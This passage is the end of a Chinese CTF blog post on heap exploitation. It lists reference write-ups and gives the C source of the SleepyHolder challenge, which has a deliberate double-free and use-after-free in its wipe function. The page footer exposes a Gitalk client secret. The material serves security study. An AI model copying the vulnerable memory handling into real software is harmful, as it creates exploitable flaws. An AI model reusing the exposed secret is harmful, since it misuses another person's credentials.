<p>[3]0x9A82.<a href="https://www.cnblogs.com/Ox9A82/p/6766261.html" target="_blank" rel="noopener">Hitcon 2016 Pwn赛题学习</a><a href="https://www.cnblogs.com/Ox9A82/p/6766261.html" target="_blank" rel="noopener">https://www.cnblogs.com/Ox9A82/p/6766261.html</a></p>
<p>[4]0x2l.堆利用之unlink小结.<a href="https://bbs.pediy.com/thread-253502.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-253502.htm</a></p>
<p>附录：</p>
<p>SleeyHolder源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;signal.h&gt;</span><br><span class="line">#include &lt;fcntl.h&gt;</span><br><span class="line">#include &lt;sys&#x2F;stat.h&gt;</span><br><span class="line">#include &lt;sys&#x2F;types.h&gt;</span><br><span class="line"></span><br><span class="line">#define BASE 40</span><br><span class="line"></span><br><span class="line">char *s_ptr;</span><br><span class="line">char *f_ptr;</span><br><span class="line">char *q_ptr;</span><br><span class="line"></span><br><span class="line">int s_flag;</span><br><span class="line">int f_flag;</span><br><span class="line">int q_flag;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">void add()</span><br><span class="line">&#123;</span><br><span class="line">​    char buf[4];</span><br><span class="line">​    char *ptr;</span><br><span class="line">​    unsigned int choice;</span><br><span class="line">​    puts(&quot;What secret do you want to keep?&quot;);</span><br><span class="line">​    puts(&quot;1. Small secret&quot;);</span><br><span class="line">​    puts(&quot;2. Big secret&quot;);</span><br><span class="line">​    if(!q_flag)</span><br><span class="line">​        puts(&quot;3. Keep a huge secret and lock it forever&quot;);</span><br><span class="line">​    memset(buf, 0 ,sizeof(buf));</span><br><span class="line">​    read(0, buf, sizeof(buf));</span><br><span class="line">​    choice &#x3D; atoi(buf);</span><br><span class="line"></span><br><span class="line">​    switch(choice)</span><br><span class="line">​    &#123;</span><br><span class="line">​        case 1:</span><br><span class="line">​            if(f_flag)</span><br><span class="line">​                return;</span><br><span class="line">​            f_ptr &#x3D; calloc(1, BASE);</span><br><span class="line">​            f_flag &#x3D; 1;</span><br><span class="line">​            puts(&quot;Tell me your secret: &quot;);</span><br><span class="line">​            read(0, f_ptr, BASE);</span><br><span class="line">​            break;</span><br><span class="line">​        case 2:</span><br><span class="line">​            if(s_flag)</span><br><span class="line">​                return;</span><br><span class="line">​            s_ptr &#x3D; calloc(1, BASE*100);</span><br><span class="line">​            s_flag &#x3D; 1;</span><br><span class="line">​            puts(&quot;Tell me your secret: &quot;);</span><br><span class="line">​            read(0, s_ptr, BASE*100);</span><br><span class="line">​            break;</span><br><span class="line">​        case 3:</span><br><span class="line">​            if(q_flag)</span><br><span class="line">​                return;</span><br><span class="line">​            q_ptr &#x3D; calloc(1, BASE*10000);</span><br><span class="line">​            q_flag &#x3D; 1;</span><br><span class="line">​            puts(&quot;Tell me your secret: &quot;);</span><br><span class="line">​            read(0, q_ptr, BASE*10000);</span><br><span class="line">​            break;</span><br><span class="line">​    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">void del()</span><br><span class="line">&#123;</span><br><span class="line">​    char buf[4];</span><br><span class="line">​    int choice;</span><br><span class="line">​    puts(&quot;Which Secret do you want to wipe?&quot;);</span><br><span class="line">​    puts(&quot;1. Small secret&quot;);</span><br><span class="line">​    puts(&quot;2. Big secret&quot;);</span><br><span class="line">​    memset(buf, 0, sizeof(buf));</span><br><span class="line">​    read(0, buf, sizeof(buf));</span><br><span class="line">​    choice &#x3D; atoi(buf);</span><br><span class="line"></span><br><span class="line">​    switch(choice)</span><br><span class="line">​    &#123;</span><br><span class="line">​        case 1:</span><br><span class="line">​            free(f_ptr);</span><br><span class="line">​            f_flag &#x3D; 0;</span><br><span class="line">​            break;</span><br><span class="line">​        case 2:</span><br><span class="line">​            free(s_ptr);</span><br><span class="line">​            s_flag &#x3D; 0;</span><br><span class="line">​            break;</span><br><span class="line">​    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">void update()</span><br><span class="line">&#123;</span><br><span class="line">​    char buf[4];</span><br><span class="line">​    int choice;</span><br><span class="line">​    puts(&quot;Which Secret do you want to renew?&quot;);</span><br><span class="line">​    puts(&quot;1. Small secret&quot;);</span><br><span class="line">​    puts(&quot;2. Big secret&quot;);</span><br><span class="line">​    memset(buf, 0, sizeof(buf));</span><br><span class="line">​    read(0, buf, sizeof(buf));</span><br><span class="line">​    choice &#x3D; atoi(buf);</span><br><span class="line"></span><br><span class="line">​    switch(choice)</span><br><span class="line">​    &#123;</span><br><span class="line">​        case 1:</span><br><span class="line">​            if(f_flag)</span><br><span class="line">​            &#123;</span><br><span class="line">​                puts(&quot;Tell me your secret: &quot;);</span><br><span class="line">​                read(0, f_ptr, BASE);</span><br><span class="line">​            &#125;</span><br><span class="line">​            break;</span><br><span class="line">​        case 2:</span><br><span class="line">​            if(s_flag)</span><br><span class="line">​            &#123;</span><br><span class="line">​                puts(&quot;Tell me your secret: &quot;);</span><br><span class="line">​                read(0, s_ptr, BASE*100);</span><br><span class="line">​            &#125;</span><br><span class="line">​            break;</span><br><span class="line">​    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">void handler()&#123;</span><br><span class="line">​    puts(&quot;Timeout!&quot;);</span><br><span class="line">​    exit(1);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">void init_prog()&#123;</span><br><span class="line">​    setvbuf(stdout, 0,2,0);</span><br><span class="line">​    signal(SIGALRM, handler);</span><br><span class="line">​    alarm(60);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line">​    init_prog();</span><br><span class="line">​    puts(&quot;Waking Sleepy Holder up ...&quot;);</span><br><span class="line">​    int fd &#x3D; open(&quot;&#x2F;dev&#x2F;urandom&quot;, O_RDONLY);</span><br><span class="line">​    unsigned int rand_size;</span><br><span class="line">​    read(fd, &amp;rand_size, sizeof(rand_size));</span><br><span class="line">​    rand_size %&#x3D; 4096;</span><br><span class="line">​    malloc(rand_size);</span><br><span class="line">​    sleep(3);</span><br><span class="line">​    char buf[4];</span><br><span class="line">​    unsigned int choice;</span><br><span class="line">​    puts(&quot;Hey! Do you have any secret?&quot;);</span><br><span class="line">​    puts(&quot;I can help you to hold your secrets, and no one will be able to see it :)&quot;);</span><br><span class="line">​    while(1)&#123;</span><br><span class="line">​        puts(&quot;1. Keep secret&quot;);</span><br><span class="line">​        puts(&quot;2. Wipe secret&quot;);</span><br><span class="line">​        puts(&quot;3. Renew secret&quot;);</span><br><span class="line"></span><br><span class="line">​        memset(buf, 0 ,sizeof(buf));</span><br><span class="line">​        read(0, buf, sizeof(buf));</span><br><span class="line">​        choice &#x3D; atoi(buf);</span><br><span class="line">​        switch(choice)&#123;</span><br><span class="line">​            case 1:</span><br><span class="line">​                add();          </span><br><span class="line">​                break;</span><br><span class="line">​            case 2:</span><br><span class="line">​                del();</span><br><span class="line">​                break;</span><br><span class="line">​            case 3:</span><br><span class="line">​                update();</span><br><span class="line">​                break;</span><br><span class="line">​        &#125;</span><br><span class="line">​    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
      
    </div>
    <footer class="article-footer">
      <a data-url="https://migraine-sudo.github.io/2019/11/25/how2heap2/" data-id="ck6c0csus000s922v8ia174k5"
         class="article-share-link">Share</a>
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/HEAP/" rel="tag">HEAP</a></li></ul>

    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2019/12/01/CVE-2012-1876/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            CVE-2012-1876
          
        </div>
      </a>
    
    
      <a href="/2019/11/22/how2heap1/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">How2Heap堆利用学习笔记(一)：fastbin_attack</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">

  
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>

  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '5ae4e05700db25ed5406',
      clientSecret: '8a38a8cb845b0b6198a0c59cab9df498ac778343',
      repo: 'migraine-sudo.github.io',
      owner: 'migraine-sudo',
      admin: ['migraine-sudo'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 Migraine</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean" target="_blank" rel="noopener">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/fujiang.jpg" alt="Migraine"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/gallery">Gallery</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/tags">Tags</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="Search">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




  
<script src="/js/tocbot.min.js"></script>

  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>



<script src="/js/ocean.js"></script>


</body>
</html>